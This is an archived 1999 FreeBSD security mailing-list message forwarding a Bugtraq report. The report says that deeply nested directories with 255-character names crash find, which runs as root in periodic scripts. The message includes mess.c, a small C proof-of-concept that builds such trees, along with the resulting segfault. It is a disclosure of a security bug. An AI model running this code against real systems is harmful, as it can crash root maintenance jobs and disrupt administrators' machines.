From owner-freebsd-security Tue May 4 14:29:38 1999 Delivered-To: freebsd-security@freebsd.org Received: from ifi.uio.no (ifi.uio.no [129.240.64.2]) by hub.freebsd.org (Postfix) with ESMTP id 9225114DE7 for ; Tue, 4 May 1999 14:29:22 -0700 (PDT) (envelope-from des@ifi.uio.no) Received: from hrotti.ifi.uio.no (2602@hrotti.ifi.uio.no [129.240.64.15]) by ifi.uio.no (8.8.8/8.8.7/ifi0.2) with ESMTP id XAA08417 for ; Tue, 4 May 1999 23:29:21 +0200 (MET DST) Received: (from des@localhost) by hrotti.ifi.uio.no ; Tue, 4 May 1999 23:29:20 +0200 (MET DST) To: security@freebsd.org Subject: [Przemyslaw Frasunek ] Re: Buffer overflow in ftpd and locate bug From: Dag-Erling Smorgrav Date: 04 May 1999 23:29:17 +0200 Message-ID: Lines: 92 X-Mailer: Gnus v5.5/Emacs 19.34 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org ------- Start of forwarded message ------- Message-ID: <19990502183800.1113.qmail@venglin.gadaczka.org> Date: Sun, 2 May 1999 20:37:35 CEST Reply-To: Przemyslaw Frasunek From: Przemyslaw Frasunek Subject: Re: Buffer overflow in ftpd and locate bug To: BUGTRAQ@NETSPACE.ORG --Message-Boundary-25450 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Content-description: Mail message body > I had problem with locate from findutils-4.1.24.rpm from Redhat-5.1 > It segfaults if we have huge directory at incoming ftp which created > by exploits for ftpd realpath hole. My ftpd is patched. Those exploits > ,i think, should not afraid me, but if updatedb puts to locate database > that directory then locate segfaults. ( getline.c 104 row by gdb ) > I guess it can be used for running arbitrary commands if root runs locate. I've noticed a similar problem with /usr/bin/find on FreeBSD. By creating _very_ long and deep directory structure it's possible to segfault /usr/bin/find (it's also used in /etc/periodic scripts, which runs on root). Example: I'm creating a directory structure with 300 subdirectories, each 255 chars length (source in attachment, also it's possible to do it via ftpd, because it calls mkdir() and chdir()). lagoon:venglin:/tmp/jc> find example > /dev/null Segmentation fault (core dumped) Gdb shows, that functions puts() was overflowed, when it tried to print a very long path. Also other system tools (rm, ls) has big problems with such directory structures. -- * Fido: 2:480/124 ** WWW: lagoon.freebsd.org.pl/~venglin ** GSM:48-601-383657 * * Inet: venglin@lagoon.freebsd.org.pl ** PGP:D48684904685DF43EA93AFA13BE170BF * --Message-Boundary-25450 Content-type: text/plain; charset=US-ASCII Content-disposition: inline Content-description: Attachment information. The following section of this message contains a file attachment prepared for transmission using the Internet MIME message format. If you are using Pegasus Mail, or any another MIME-compliant system, you should be able to save it or view it from within your mailer. If you cannot, please ask your system administrator for assistance. ---- File information ----------- File: mess.c Date: 2 May 1999, 19:01 Size: 748 bytes. Type: Text --Message-Boundary-25450 Content-type: Application/Octet-stream; name=mess.c; type=Text Content-disposition: attachment; filename="mess.c" #include #include #include #include #define DUMP 0x41 main(int argc, char *argv[]) { char buf[255]; int i = 0; if (argc < 3) { fprintf(stderr, "usage: %s \n", argv[0]); exit(1); } if(chdir(argv[1])) { fprintf(stderr, "error in chdir(): %s\n", strerror(errno)); exit(1); } memset(buf, DUMP, 255); for(i=0;i<(atoi(argv[2]))-1;i++) { if(mkdir(buf, (S_IRWXU | S_IRWXG | S_IRWXO))) { fprintf(stderr, "error in mkdir() after %d iterations: %s\n", i, strerror(errno)); exit(1); } if(chdir(buf)) { fprintf(stderr, "error in chdir() after %d iterations: %s\n", i, strerror(errno)); exit(1); } } exit(0); } --Message-Boundary-25450-- ------- End of forwarded message ------- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message